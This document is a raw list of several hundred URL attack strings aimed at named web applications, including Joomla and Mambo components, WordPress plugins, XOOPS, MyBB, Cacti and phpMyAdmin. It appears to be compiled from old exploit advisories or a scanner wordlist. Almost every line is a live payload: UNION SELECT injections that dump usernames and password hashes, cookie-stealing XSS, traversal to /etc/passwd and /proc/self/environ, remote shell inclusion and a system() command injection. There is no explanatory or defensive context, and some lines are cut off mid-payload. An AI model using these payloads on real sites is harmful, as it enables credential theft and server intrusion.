/admin/header.php?language=[XSS]&anzeigebreite=[XSS]
/inc/lib/languages.lib.php?language=../../[file]
/admin/adminusers.php?dir=[XSS]
/admin/adminusers.php?sort=[XSS]
/admin/advancedUserSearch.php?action=[XSS]
/admin/campusProblem.php?view=[XSS] 
/Board/read.php?id=[SQL] 
/index.php?page=../../../../../../../../../etc/passwd 
//admin/header.php?lang[adminseite]=XSS&lang[ueberschrift]=XSS&einst[metachar]=XSS 
/dwoprn.php?f=connectdb.php
/forum_forum.php?id=[XSS]
/forum_text_search_action.php?search_string=[XSS]&titles=Search
/forum_text_search_action.php?search_string=[XSS]&bodies=Search
/guest/base/usr/0.php 
/php-stats-path/tracking.php?what=online&ip=[XSS] 
/simplePHPLinux/3payment_receive.php?paymentin
/cpg/mode.php?admin_mode=1&referer=javascript
/hilfe.php?chapter="+onmouseover=alert(1898233298)+
/[VIGILE_CMS_PATH]/index.php?nav=[WIKINAME]&title=[XSS]
/[VIGILE_CMS_PATH]/index.php?nav=[WIKINAME]&cat=[XSS] 
/modules/arcade/index.php?act=play_game&gid=[SQL] 
/modules.php?name=Dance_Music-MM&page=1&ACCEPT_FILE[1]=../../../../../../../../../etc/passwd 
/[PRODUCT DIRECTORY]/admin/?no_rgcheck=true&lang=1&l_username=</td><script>alert(document.cookies)</script><td>
/[PRODUCT DIRECTORY]/admin/emoticonlist.php?lang=1&l_emoticonlist=</title><script>alert(document.cookies)</script>
/[product_directory]/admin/layout2b.php?no_rgcheck=true&lang=1&do_login=1&l_username=</td><script>alert(document.cookies)</script><td>
/[product_directory]/comment.php?lang=en&mode=new&entryref=&backurl="><script>alert(document.cookies)</script>
/index.php?action=<script>alert("XSS");</script> 
/index.php?lid=de&tid=modern_blue&f_user=&six=&f_email=[XSS] 
/libraries/comment/postComment.php?path[cb]=[Shell URL]?a= 
/wordpress/wp-admin/options-general.php?
/with/new/feed&
/with/new/feed&#039;;
/GForgePath/account/verify.php?confirm_hash="/><p>This must not happen</p> 
/[PATH]/login.php?mode=[XSS]
/[PATH]/default.asp?mode=advanced_login&mode2=[XSS] 
/news_page.php?page_id=">XSS 
/path/administrator/components/com_wmtrssreader/admin.wmtrssreader.php?mosConfig_live_site=sh3ll? 
/phpMyAdmin-2.11.1/scripts/setup.php?>'"><script>alert('xss');</script> 
/ActiveKB/page?=XSS 
/index.php?option=com_search&searchword=';alert('XSS') 
/index.php?id=../../../../../../../../../../../etc/passwd 
/search/search_do/?search_string=%22%20onmouseover=%22javacript
/index.php?DOCUMENT_ROOT=shell??
/login.php?DOCUMENT_ROOT=shell?? 
/index.php?blogid=1&archive=2007-01-01%3Cscript%3Ealert(document.cookie)%3C/script%3E 
/detail.php?course=[SQL]
/detail.php?provider=[SQL] 
/main.php?p=[SQL] 
/index.php?styl[top]=shell?? 
/shop.php?cmd=sto&id=[SQL] 
/translator.php?dir=/etc/passwd%00
/translator.php?lang=zh_CN&cmd=upd&edit=$GET[%22lang%22];system(%22uname%20-a%22);
/integrator.php?lang="><script>alert(&#039;xss&#039;)</script>
/index.php?target=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
/command.php?command=Modify%20User&uid=%22%3E%3Cscript%3Ealert(&#039;xss&#039;)%3C/script%3E
/[PATH]/?__f=article&art_id=###[XSS]&node=###[XSS]
/path/lostpwd.php?lost_id=[XSS] 
/rnote/rnote.php?d=<script>alert("RxH")</script 
/rnote/rnote.php?u=<script>alert("RxH")</script 
/index.php?module=../../../../etc/passwd 
/flatnuke3_path/index.php?mod=[forum_path]
/flatnuke3_path/index.php?
/flatnuke3_path/index.php?mod=none_filemanager&dir=/
/flatnuke3_path/index.php?mod=none_filemanager&dir=/
/hackish/shoutbox/blocco.php?go_shout=Matrix86%3C/a%3E%3C/p%3E%3C/div%3E%3Chtml%3E%3Cscript%3Ealert(document.cookie);%3C/script%3E%3C/html%3E
/index.php?page=media&id=[SQL INJECTION CODE GOES HERE] 
/[path]/download.php?settings2.inc.php 
/upload/upload.php?ServerPath=http
/includes.php?root=[shell] 
/directory.php?go=-1+union+select+1,concat(name,0x3a,password),3+from+[forum]_members+where+id=[id]
/directory.php?cat=-1+union+select+1,concat(name,0x3a,password),3+from+[forum]_members+where+id=[id] 
/wp-admin/edit-post-rows.php?posts_columns[]=<script>alert(123);</script> 
/index.php?page=&email=<Evil-Script> 
/index.php?page=home&command=<Evil-Script> 
/index.php?page=home&component=currencies&command=<Evil-Script> http
/smartshop/users/kb.php?id=10002&category_id=XSS
/users/kb.php?category_id=XSS 
/admin/menu.php?config[news_url]="><script>alert(document.cookies)</script> 
/example.php?template=' UNION SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(USER_NAME, USER_PWD), NULL FROM SX_saxon_users %23 
/index.php?page=../../../../../../../../../../../etc/passwd 
/dialog.php?action=editauthor&doc=pagename 
/phpMyAdmin/server_status.php/"><script>alert('xss')</script> 
/calendar/admin/index.php?msg=1&username=[XSS] 
/index.php?whattodo=../../../../../../../../../../../etc/passwd%00 
/post_static_0-11/_lib/fckeditor/upload_config.php?DDS=[shell] 
/articles.php?lingvo=ca&id=10 UNION ALL SELECT null,null,concat(usr_login,0x23,usr_pass),null,null FROM usuaris/* 
/PATH/buscador.php?clave=[XSS] 
/index.php?DatabaseType=[Local File]%00 
/siteminderagent/forms/smpwservices.fcc?SMAUTHREASON=[XSS] https
/modules/mylinks/brokenlink.php?lid=1%20OR%201=2 
/login.php" method="post"><input type="text" name="username" value='"<script>alert(1)</script>'><input type="submit"></form> 
/home/rss.php/<script>alert(1)</script> 
/AutoIndex/index.php?dir=%00 
/AutoIndex/index.php/"><script>alert(document.cookie)</script> 
/sources/frame.php?room=<script>alert(123);</script> 
/upgradev1.php?INSTALL_X7CHATVERSION=<script>alert(123);</script>
/dialog.php?action=del&doc='+pagename // Delete
/dialog.php?action=delbackup&doc='+pagename // Delete Backup
/dialog.php?action=res&doc='+pagename // Reset
/dialog.php?action=ren&doc='+pagename // Rename 
/index.php?file=News%3CScRiPt%20%0a%0d%3Ealert(1121436095)%3B%3C/ScRiPt%3E
/c/portal/login?login=%22%3E%3Cscript%3Edocument.fm1.action=%22http
/id/-22
/foo.bar
/recursos/agent.php?resource_id=-11 OR 'foobar' UNION SELECT user()-- -
/recursos/agent.php?version_id=-22 OR '' UNION SELECT @@version-- -
/recursos/agent.php?path=/../../application/config/project.ini
/')" > <h1>Ucms v. 1.8 Np exploit</h1> Actual Request
/poll/index.php?action=create_new 
/path/to/index.php?func=[injectionpoint]
/path/to/index.php?date=[injectionpoint]
/path/to/index.php?func=log&jid=[injectionpoint]
/path/to/index.php?func=user&jid=[injectionpoint] 
/vBTube.php?do=search&search=<script>alert(document.cookie)</script> 
/scripts/demo/phpslideshow.php?directory="><iframe> http
/PATH/index.php?album=[XSS] 
/PATH/index.php?action=category&id=[XSS] 
/[tilde_path]/index.php?id=[yeardetail_id]&mode=yeardetail&aarstal=[XSS]
/pmapper-3.2-beta3/incphp/globals.php?_SESSION[PM_INCPHP]=http
/pmapper-3.2-beta3/plugins/export/mc_table.php?_SESSION[PM_INCPHP]=http
/portal/server.pt?in_hi_req_objtype=1&space=SearchResult&in_tx_fulltext=*&in_hi_req_ apps=1&control=advancedstart&in_hi_req_page=100&parentname=AdvancedSearch&in_ra_ topoperator=and
/portal/server.pt?in_hi_req_objtype=1&space=SearchResult&in_tx_fulltext=*admin*&in_hi_ req_apps=1&control=advancedstart&in_hi_req_page=100&parentname=AdvancedSearch&in_ra_ topoperator=and
/portal/server.pt?in_hi_req_objtype=1&space=SearchResult&in_tx_fulltext=*test*&in_hi_req_apps= 1&control=advancedstart&in_ hi_req_page=100&parentname=AdvancedSearch&in_ra_topoperator=and 
/modules/myalbum/ratephoto.php?lid=-1%20UNION%20SELECT%20pass%20FROM%20bcoos_users%20LIMIT%201 
/modules/mylinks/ratelink.php?lid=-1%20UNION%20SELECT%20pass%20FROM%20bcoos_users%20LIMIT%201 
/upload/xax/admin/modules/install_module.php?level=http
/upload/xax/admin/modules/uninstall_module.php?level=http
/upload/xax/admin/patch/index.php?level=http
/upload/xax/ossigeno/admin/install_module.php?level=http
/upload/xax/ossigeno/admin/uninstall_module.php?level=http
/ossigeno_modules/ossigeno-catalogo/xax/ossigeno/catalogo/common.php?ossigeno=http
/modules/adresses/ratefile.php?lid=-1%20UNION%20SELECT%20pass%20FROM%20bcoos_users%20LIMIT%201 
/phpmychat/chat/deluser.php3?L=english&Link=&LIMIT=>"&#039;><img%20src%3D%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;%26%23x70;%26%23x74;%26%23x3a;alert(%26quot;Successfull%26%23x20;XSS%26%23x20;Test%26%23x20;Here%26quot;)>&AUTH_USERNAME=&AUTH_PASSWORD=
/mychat/chat/users_popupL.php3?From=..%2FphpMyChat.php3&L=english&LastCheck= 
/phpmychat/chat/users_popupL.php3?From=..%2FphpMyChat.php3&L=english&LastCheck=1196698786&B= 
/index.php?option=com_content&view=somechars'%20+%20'article&id=25&Itemid=28
/index.php?searchword=&task=somechars%27+%2B+%27search&option=com_search
/index.php?searchword=&task=search&option=somechars%27+%2B+%27com_search 
/ezcontents1_4x/index.php?link=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd 
/SupportSuite/upload/includes/LoginShare/modernbill.login.php/%3Cscript%3Ealert(1)%3C/script%3E 
/path/to/opennewsletter/compose.php?type=html'%3Ch1%3EXSS!%3C/h1%3E http
/script> 100"
/[PATH]/index.php?site=usergallery&action=upload&galleryID=">[your code]
/[PATH]/index.php?site=calendar&action=announce&upID=">[your code]
/[PATH]/index.php?site=calendar&action=announce&tag=">[your code]
/[PATH]/index.php?site=calendar&action=announce&month=">[your code]
/[PATH]/index.php?site=calendar&action=announce&userID=">[your code]
/[PATH]/index.php?site=calendar&action=announce&year=">[your code] 
/e-xoops/modules/mylinks/ratelink.php?lid=-1%20UNION%20SELECT%20pass%20FROM%20e_xoops_users%20LIMIT%201 
/e-xoops/modules/adresses/ratefile.php?lid=-1%20UNION%20SELECT%20pass%20FROM%20e_xoops_users%20LIMIT%201 
/e-xoops/modules/mydownloads/ratefile.php?lid=-1%20UNION%20SELECT%20pass%20FROM%20e_xoops_users%20LIMIT%201
/e-xoops/modules/mysections/ratefile.php?lid=-1%20UNION%20SELECT%20pass%20FROM%20e_xoops_users%20LIMIT%201 
/e-xoops/modules/myalbum/ratephoto.php?lid=-1%20UNION%20SELECT%20pass%20FROM%20e_xoops_users%20LIMIT%201
/e-xoops/modules/banners/click.php?bid=-1%20UNION%20SELECT%20pass%20FROM%20e_xoops_users%20LIMIT%201
/e-xoops/modules/arcade/index.php?act=show_stats&gid=-1%20UNION%20SELECT%20pass%20FROM%20e_xoops_users%20LIMIT%201 
/e-xoops/modules/arcade/index.php?act=play_game&gid=-1%20UNION%20SELECT%20pass%20FROM%20e_xoops_users%20LIMIT%201 
/sitemap.xml.php?dir[classes]=[Evil_Code] 
/users/register.php/XSS
/search/index.php/XSS
/search/index.php?tk=316dccdfb62a3cad613e&highlight=[SQL_INJECTION]=&search=go 
/autohtml.php?filename=../../../../../../../../../../../../../../../etc/passwd 
/xoops/modules/profile/register.php?>'"><script>alert('XSS');</script>
/index.php?ind=gallery&op=foto_show&ida=(sql) 
/phpayv2.02a/main.php?config=eregi.inc.php\\..\\admin\\.htaccess
/phpayv2.02a/main.php?config=eregi.inc.php\..\admin\.htaccess 
/phpRPG-0.8.0/tmp/ 
/wordpress/index.php/wp-admin/ 
/global/templates/admin_page_open.php?g_root_dir=http
/global/templates/client_page_open.php?g_root_dir=http
/index.php?do=index&dummy=dummy');alert('XSS');void('
/index.php?do=details&task_id=1174&details=');alert('XSS 
/patch/?q=&#039;/**/union/**/select/**/1,2,adminmail,4,id/**/from/**/neuronnews_configuration/*
/patch/?q=viewtopic&topic=<script>alert(111111)</script>
/patch/?q=newsarchive&newsyear=<script>alert(111111)</script>
/patch/?q=newsarchive&newsyear=<script>alert(111111)</script>&newsmonth=<script>alert(111111)</script>
/PSF/lib/base.inc.php?MODEL_DIR=http
/PSF/lib/base.inc.php?DAO_DIR=/etc/passwd%00
/PSF/index.php?page=authentification HTTP/1.1\r\n
/>
/iSupport/index.php?include_file=[local file]
/helpdesk/index.php?include_file=../../../../../proc/self/environ
/helpdesk/index.php?include_file=../../../../../etc/passwd 
/PATH/moodle/ing/blocks/mrbs/code/web/view_entry.php?id=2000%20UNION%20SELECT%20username,id,id,id,id,id,id,id,id,id,id,id%20FROM%20mdl_user%20WHERE%20id=[ID]&day=27&month=10&year=2007 
/[path]/games.php?id=[Sh3ll-Script] 
/main/forum/viewthread.php?forum=XSS
/main/forum/viewforum.php?cidReq=[Forum-ID]&forum=XSS
/main/work/work.php?cidReq=[Forum-ID]&curdirpath=/&display_upload_form=true&origin=XSS 
/admin/index.php?loadadminpage=http
/logaholic/update.php?conf=nameofprofile&page=SQL INjection
/logaholic/index.php?conf=nameofprofile&from=SQL INJECTION
/index.php?conf=<img+src=http
/admin.php?com_option=>"'><SCRIPT>a=/XSS/;alert(a.source)</SCRIPT> 
/[path/to/faq/]/faq.php?category_id=1&cat_name=[XSS] 
/collabtive/managetimetracker.php?action=projectpdf&id=2 and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,cast(schema_name as char),0x27,0x7e) FROM information_schema.schemata LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
/[path/to/faq]/faq.php?category_id=1'%20union%20select%201,1,user(),1/*
/[path/to/faq]/faq.php?category_id=1'%20union%20select%201,1,passwrd,1%20from%20users%20where%20userid='admin 
/openbiblio/admin/staff_del_confirm.php?UID=1&LAST=[XSS]&FIRST=[XSS]
/openbiblio/admin/theme_del_confirm.php?themeid=6&amp;name=[XSS]
/openbiblio/admin/theme_preview.php" method="post">
/[phcdownload/search.php?string=' 
/[phcdownload/search.php?string=[XSS]
/[path]/includes/function.php?root_path=[Shellcode] 
/PATH/dir.php?do=browse&cat=[XSS] 
/user/remindPassword?return=XSS
/category?id=1&q=XSS
/order?return=order/XSS
/user/remindComplete?email=XSS 
/modx-0.9.6.1/assets/js/htcmime.php?file=../../manager/includes/config.inc.php%00.htc 
/modx-0.9.6.1/index-ajax.php?
/templates/example_template.php?data[title]=%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
/templates/example_template.php?data[message]=%3Cscript%3Ealert(document.cookie)%3C/script%3E
/templates/example_template.php?data[table][1][item]=%3Cscript%3Ealert(document.cookie)%3C/script%3E
/templates/example_template.php?data[table][1][url]=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
/templates/example_template.php?data[poweredby]=%3Cscript%3Ealert(document.cookie)%3C/script%3E 
/templates/example_template.php?data[title]=%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
/templates/example_template.php?data[message]=%3Cscript%3Ealert(document.cookie)%3C/script%3E
/templates/example_template.php?data[table][1][item]=%3Cscript%3Ealert(document.cookie)%3C/script%3E
/templates/example_template.php?data[table][1][url]=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
/templates/example_template.php?data[poweredby]=%3Cscript%3Ealert(document.cookie)%3C/script%3E
/index.php?URL=%0AContent-Type
/Path/index.php?path=[SHELL] 
/account/index.html?user=%3Cscript%3Ealert(document.cookie)%3C/script%3E http
/strawberry/plugins/wacko/highlight/html.php?text=%3C!--{${eval($s)}}--%3E&s=include('www.example2.com/shell');
/eTicket/admin.php?a=my" method="post">
/eTicket/view.php?s="><script>alert(document.cookie)</script>
/eTicket/search.php?s=advanced&text=test&cat=&status=open&#039;SQL&search_submit=Search
/eTicket/admin.php?a=headers&msg=SQL&#039;
/index.php?file==%2Fetc%2Fpasswd 
/component/option,com_smf/Itemid,8'XSS,1/topic,1.0/
/component/option,com_smf/Itemid,5/topic,1.XSS/ 
/liste.php?idFamille=1%20or%201=1#
/liste.php?idFamille=1%20or%201=0# 
/view_func.php?i=http
/index.php?message=%3Cscript%3Edocument.writeln(123)%3C/script%3E%20 
/pm/language/spanish/preferences.php?L_PREF_NAME[855]=<script>alert(ZOMG!);</script>
/admin/login.php?user=admin'-- | /* 
/mybb.1.2.10/moderation.php?fid=2&action=do_mergeposts&mergepost[-1]=1&mergepost[-2)UNION+ALL+SELECT+1,2,3,4,1,6,7+UNION+ALL+SELECT+1,(SELECT+CONCAT(0x5e,username,0x5e,password,0x5e,salt,0x5e,0x27)+FROM+mybb_users+LIMIT+0,1),3,4,1,6,7/*]=2
/mybb.1.2.10/moderation.php?fid=2&action=allreports&rid=0'+UNION+SELECT+waraxe--+
/mybb.1.2.10/moderation.php?fid=2&action=do_multimovethreads&moveto=2&threads=war|axe 
/cc/postcomment.php?ID=&#039;/**/union/**/select/**/1,2,3,4,5,6,concat(char(117,115,101,114,110,97,109,101,61),username),concat(0x70617373776f72643d,password),9,10,11,12,13,14,15,16,17/**/from/**/cc_users/**/where/**/theid=1/*
/cc/gallery.php?album=&#039;/**/union/**/select/**/null,password,null,null,username,null,null,null/**/from/**/cc_users/**/where/**/theid=1/*
/cc/gallery.php?album=<script>alert(&#039;xss&#039;)</script>
/[Target.il]/[Path]/theme/phpAutoVideo/LightTwoOh/sidebar.php?loadpage=[SH3LL]
/[Target.il]/[Path]/index.php?cat=%22%3E%3Cscript%3Ealert(1);%3C/script%3E
/[singapore_path]/default.php?gallery="><script>alert(document.cookie);</script> 
/inc/linkbar.php?ffile=http
/pacercms/siteadmin/article-edit.php?id=[SQL] 
/path/templates/default/admincp/attachments_header.php?lang_listofmatches=<script>alert("XSS")</script> 
/[path]/index.php?option="'><IFRAME%20SRC="javascript
/user/index.php?"><script>alert('xss')</script>
/maint/index.php?"><script>alert('xss')</script> 
/pref.php?>&#039;"><script>alert(&#039;XSS&#039;)</script>
/search.php?adv=>"&#039;><img%20src%3D%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;%26%23x70;%26%23x74;%26%23x3a;alert(%26quot;XSS%26quot;)>
/install.php?lang=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00 
/index.php/"><script>alert('XSS')</script> 
/[installdir]/action.php/"><script>alert('DSecRG XSS')</script> 
/scriptpath/index.php?what=search&start=0&dir=ASC&sorttbl=track&order_by=track.name&limit=[Xss] 
/index.php?option=com_buslicense&sectionid=9999&Itemid=9999&task=list&aid=-1/**/union/**/select/**/0,username,0x3a,password,4,5,6,7,8,9,10,11,12,13,14/**/from/**/mos_users/* 
/path/index.php?site=whoisonline&sort=">[xss code] 
/defter/index.php?sayfa=[sqL inj. code here ..] 
/comments.php?thispost=../../../../../../../../../../etc/passwd 
/telefonia/E-Guest_show.php?display=(sql) 
/script/catalog.php?mode=viewcategory&id=<script>alert(document.cookie)</script> 
/wordpress/wp-content/plugins/wp-footnotes/admin_panel.php?wp_footnotes_current_settings[priority]="><script>alert("XSS")</script>
/wordpress/wp-content/plugins/wp-footnotes/admin_panel.php?wp_footnotes_current_settings[style_rules]=&lt;/textarea&gt;<script>alert("XSS")</script>
/wordpress/wp-content/plugins/admin_panel.php?wp_footnotes_current_settings[pre_footnotes]=&lt;/textarea&gt;<script>alert("XSS")</script>
/wordpress/wp-content/plugins/admin_panel.php?wp_footnotes_current_settings[post_footnotes]=&lt;/textarea&gt;<script>alert("
/ViewCat.php?CatID=[SQL] 
/ViewCat.php?CatID=[XSS]
/wp-content/plugins/st_newsletter/shiftthis-preview.php?newsletter=-1/**/UNION/**/SELECT/**/concat(0x7c,user_login,0x7c,user_pass,0x7c)/**/FROM/**/wp_users 
/search.php?search="><script>alert(/vuln/)</script> 
/youtube/siteadmin/editor_files/includes/load_message.php?lang[please_wait]=[XSS] 
/path/admin/system/config/conf-activation.php?site_path=http
/path/admin/system/menu/item.php?site_path=http
/path/admin/system/modules/conf_modules.php?site_path=http
/path/system/login.php?site_path=http
/modules/devtracker/index.php?proj_id=1&order_by=priority&direction=ASCquot;><script>alert()</script> 
/modules/devtracker/index.php?proj_id=1&order_by=priorityquot;><script>alert()</script>&direction=ASC 
/index.php?hash="><iframe src=http
/[path]/index.php?name=pagetool_search&search_term=[XSS] 
/[installdir]/manager/index.php?a=75&search="><IMG 
/[installdir]/manager/index.php?a=84&search="><IMG 
/[installdir]/index.php?searched=modx&highlight="><IMG 
/[installdir]/manager/index.php?a=&#039;<img 
/index.php?option=com_sermon&gid=-9999999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/concat(username,0x3a,password),0,0,username,password%2C0%2C0%2C0/**/from/**/mos_users/* 
/index.php?class=calimero_webpage&id="><script>alert(/vulnxss/)</script> 
/members_help.php?hlp=http
/plugin/tag/%3Cdiv%20style=[XSS] 
/About/SC_About.htm 
/path/index.php?num=[SQL]
/path/index.php?category=[XSS]
/path/index.php?num=9999999999&category=[XSS] 
/vwar/calendar.php?month=[SQL] 
/index.php?option=com_rapidrecipe&page=showuser&user_id=-1+union+all+select+concat(username,0x3a,password)+from+jos_users+limit+0,20--
/index.php?option=com_rapidrecipe&page=viewcategorysrecipes&category_id=-1+union+all+select+concat(username,0x3a,password),2+from+jos_users+limit+0,20-- 
/index.php?option=com_comments&task=view&id=-1+UNION+SELECT+0,999999,concat(username,0x3a,PASSWORD),0,0,0,0,0,0+FROM+mos_users+union+select+*+from+mos_content_comments+where+1=1 
/artmedic_weblog/artmedic_print.php?date=<script>alert(1)</script>
/artmedic_weblog/index.php?jahrneu=<script>alert(1)</script>
/index.php?page=downloads&mode=details&id=-1/**/union/**/select/**/0,member_nick,111,member_pass,222,333,444,555,666/**/from/**/tbl_member/* 
/index.php?option=com_iomezun&task=edit&hidemainmenu=S@BUN&id=-1/**/union/**/select/**/null,null,null,username,password,null,null,null,null,null,null/**/from/**/jos_users/* 
/cacti/graph_view.php?action=preview&style=selective&graph_list=bla'%20or%20'1'='1
/cacti/graph.php?local_graph_id=1&rra_id=34&action=properties&view_type=token'%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
/cacti/graph_view.php?action=list&page=1&host_id=0&graph_template_id=8&filter=onmouseover=javascript
/cacti/tree.php?action=edit&id=1&subaction=foo&leaf_id=1%20or%201%20=%201
/cacti/tree.php?action=edit&id=1" -d \
/cacti/graph_xport.php?local_graph_id=1" -d \
/cacti-0.8.7a/index.php/sql.php" -d \
/cacti-0.8.7a/index.php/sql.php" -d \
/index.php?option=com_pcchess&Itemid=S@BUN&page=players&user_id=-9999999/**/union/**/select/**/concat(username,0x3a,password)/**/from/**/jos_users/* 
/index.php?option=com_model&Itemid=0&task=pipa&act=2&objid=-9999/**/union/**/select/**/username,password/**/from/**/mos_users/* 
/index.php?option=com_omnirealestate&Itemid=0&func=showObject&info=contact&objid=-9999/**/union/**/select/**/username,password/**/from/**/mos_users/*&resu
/[installdir]/whoisonline.php?id=1'+and+"dsec"="dsecrg"+union+select+user(),version()/*
/[installdir]/main/calendar/myagenda.php?courseCode="><script>alert('DSecRG XSS')</script>
/[installdir]/dokeos/main/admin/course_category.php?category=<script>alert('DSecRG XSS')</script>
/[installdir]/dokeos/main/admin/session_list.php?action=show_message&message=>%22%27><img/src=javascript
/[installdir]/main/mySpace/index.php?tracking_list_coaches_direction=ASC&tracking_list_coaches_page_nr=1&tracking_list_coaches_per_page=20&view=admin&tracking_list_coaches_column=0';
/artmedic_weblog/index.php?ta=../../../../../../../../../../etc/passwd%00
/artmedic_weblog/artmedic_print.php?date=../../../../../../../../../../etc/passwd%00 
/locator/index.php?page=../../../../../../../../../../etc/passwd%00 
/index.php?option=com_smslist&Itemid=99999999&listid=9999999/**/union/**/select/**/name,password/**/from/**/mos_users/* 
/index.php?option=com_activities&Itemid=51&func=detail&id=-1/**/union/**/select/**/0,1,password,3,4,5,6,7,8,9,10,11,12,13,14,15,username/**/from/**/mos_users/*
/index.php?option=com_sg&Itemid=16&task=order&range=3&category=3&pid=-9999999/**/union/**/select/**/0,1,concat(username,0x3a,password),0x3a,0x3a,0x3a,0x3a,0x3a,0x3a,0x3a,10,11,0x3a,0x3a,14,15,16/**/from/**/jos_users/*
/index.php?option=faq&task=viewallfaq&catid=-9999999/**/union/**/select/**/concat(username,0x3a,password),0x3a,0/**/from/**/mos_users/* 
/forums?forum=1&topic=-99999/**/UNION/**/SELECT/**/concat(0x7c,user_login,0x7c,user_pass,0x7c)/**/FROM/**/wp_users/* 
/index.php?pagename=sf-forum&forum=-99999/**/UNION/**/SELECT/**/0,concat(0x7c,user_login,0x7c,user_pass,0x7c),111,222,333,444,555/**/FROM/**/wp_users/* 
/?page_id=xxxx&forum=S@BUN&topic=-1%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/0,concat(0x7c,user_login,0x7c,user_pass,0x7c),111,222,333,0,0,0,0,0/**/from%2F%2A%2A%2Fwp_users/**where%20id%201%20=%20-1 
/index.php?option=com_salesrep&action=showrep&Itemid=S@BUN&rid=-9999999/**/union/**/select/**/0,concat(username,0x3a,password),0x3a,0x3a,0x3a,0x3a,0x3a,0x3a,0x3a,0x3a,
/index.php?option=com_lexikon&id=-1/**/union/**/select/**/concat(username,0x3a,password),concat(username,0x3a,password),concat(username,0x3a,password)/**/from/**/mos_u
/index.php?option=com_filebase&Itemid=S@BUN&func=selectfolder&filecatid=-1/**/union/**/select/**/concat(username,0x3a,password),concat(username,0x3a,password),concat(u
/index.php?option=com_scheduling&Itemid=28&action=viewAbstract&id=-9999999/**/union/**/select/**/0,1,concat(username,0x3a,password),concat(username,0x3a,password),4,5,
/DMS/index.php?action=../../../../../../../../../../etc/passwd%00 
/index.php?option=com_profile&Itemid=s@bun&task=&task=viewoffer&oid=9999999/**/union/**/select/**/concat(username,0x3a,password)/**/from/**/jos_users/* 
/index.php?option=com_detail&Itemid=s@bun&id=-1%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0%2C1%2C2%2C3%2C0x3a%2Cpassword%2Cusername%2F%2A%2A%2Ffrom%2F%2A%2A%2Fmos_users%20%2F%2A%2A 
/wp-content/plugins/simple-forum/ahah/sf-profile.php?u=-999999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0%2C1%2C2%2C3%2C4%2Cconcat(0x7c,user_login,0x7c,user_pass,0x7c)%2C6%2C7%2C8%2C0x7c%2F%2A%2A%2Ffrom%2F%2A%2A%2Fwp_users 
/wp-content/plugins/recipe/wordspew-rss.php?id=-998877/**/UNION/**/SELECT/**/0,1,concat(0x7c,user_login,0x7c,user_pass,0x7c),concat(0x7c,user_login,0x7c,user_pass,0x7c),4,5/**/FROM/**/wp_users 
/projectpier/index.php?c=access"><script>alert('xss')</script>&a=login"><script>alert(document.cookie)</script>
/wp-content/plugins/wp-people/wp-people-popup.php?person=-1%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0%2Cuser_pass%2Cuser_login%2C3%2F%2A%2A%2Ffrom%2F%2A%2A%2Fwp_users
/[installdir]/index.php?frontend=<IMG SRC="javascript
/[installdir]/index.php/"><script>alert(&#039;DSecRG XSS&#039;)</script>
/[installdir]/ajax_request.php?language=<IMG SRC="javascript
/[installdir]/slim.php?jz_path=<IMG SRC="javascript
/[installdir]/popup.php?ptype=sitenew&siteNewsData = &lt;/textarea&gt;<script>alert(&#039;DSecRG XSS&#039;)</script>
/[installdir]/popup.php?ptype=playlistedit&query = <script>alert(&#039;DSecRG XSS&#039;)</script>
/[installdir]/popup.php?theme=<IMG SRC="javascript
/[path]/index.php?act=delall 
/xxxxSections&op=viewarticle&artid=-9999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%20%20/**/0,1,aid,pwd,4/**/from/**/nuke_authors/*where%20admin%20-2 
/index.php?option=com_facileforms&Itemid=640&user_id=107&catid=-9999999/**/union/**/select/**/concat(username,0x3a,password)/**/from/**/jos_users/* 
/index.php?option=com_team&gid=-1/**/union/**/select/**/1,2,3,password,5,6,7,8,9,10,username,12,13/**/from/**/jos_users/* 
/index.php?option=com_iigcatalog&Itemid=56&act=viewCat&cat=-9999999/**/union/**/select/**/concat(username,0x3a,password)/**/from/**/mos_users/* 
/index.php?option=com_formtool&task=view&formid=2&catid=-9999999/**/union/**/select/**/concat(username,0x3a,password)/**/from/**/jos_users/* 
/index.php?option=com_genealogy&task=profile&id=-9999999/**/union/**/select/**/0,0x3a,2,0x3a,0x3a,5,0x3a,0x3a,8,concat(username,0x3a,password)/**/from/**/jos_users/* 
/index.php?option=com_magazine&task=guide&id=21&page=7&pageid=-9999999/**/union/**/select/**/0,concat(username,0x3a,password),0x3a,concat(username,0x3a,password),0x3a,0x3a,0x3a,0x3a,111,222,333,444,555/**/from/**/jos_users/** 
/modules/vacatures/index.php?pa=view&cid=-00000/**/union/**/select/**/0000,concat(uname,0x3a,pass),concat(uname,0x3a,pass)/**/from/**/xoops_users/**where%20admin%20-111 
/modules/events/index.php?op=show&id=-6666+union/**/select/**/0x3a,0x3a,0x3a,uname,pass/**/from/**/xoops_users/*where%20admin%20-111 
/modules/seminars/index.php?op=show&id=-77777/**/union/**/select/**/0x3a,0x3a,0x3a,0x3a,uname,pass,0x3a,0x3a,0x3a/**/from/**/xoops_users/*where%20admin 
/modules/badliege/index.php?op=show&id=-9999999/**/union/**/select/**/0x3a,0x3a,0x3a,uname,pass/**/from+xoops_users/*where%20admin%20-5 
